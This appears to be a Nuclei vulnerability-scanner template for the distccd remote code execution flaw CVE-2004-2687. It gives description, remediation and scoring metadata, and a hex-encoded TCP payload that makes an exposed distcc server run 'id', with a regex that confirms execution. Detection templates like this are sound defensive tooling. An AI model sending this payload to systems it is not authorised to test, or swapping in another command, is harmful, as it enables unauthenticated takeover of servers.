id: CVE-2004-2687

info:
  name: Distccd v1 - Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
  impact: |
    Unauthenticated attackers can execute arbitrary commands with elevated privileges by sending malicious compilation jobs to distcc servers that lack access restrictions.
  remediation: |
    Configure distcc to restrict server port access to authorized clients only, or upgrade to a patched version that includes proper authorization checks.
  reference:
    - http://distcc.samba.org/security.html
    - http://lists.samba.org/archive/distcc/2004q3/002550.html
    - http://lists.samba.org/archive/distcc/2004q3/002562.html
    - https://github.com/crypticdante/distccd_rce_CVE-2004-2687
    - https://github.com/gwyomarch/Lame-HTB-Writeup-FR
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
    cvss-score: 9.3
    cve-id: CVE-2004-2687
    cwe-id: CWE-16
    epss-score: 0.90467
    epss-percentile: 0.99624
    cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2004,network,rce,distccd,vuln

tcp:
  - inputs:
      - data: 444953543030303030303031
        type: hex
      - data: 41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141
        type: hex

    host:
      - "{{Hostname}}"
    port: 3632

    matchers:
      - type: regex
        part: raw
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 490a0046304402207f9eff918dd1bd1f893fba97dc84b837954f07617ebb6284a571da3e4913685c02200f2cf42d0df9ccc94507ab4225a5f743635abfe955f6150ef5979a43722135a4:922c64590222798bb761d5b6d8e72950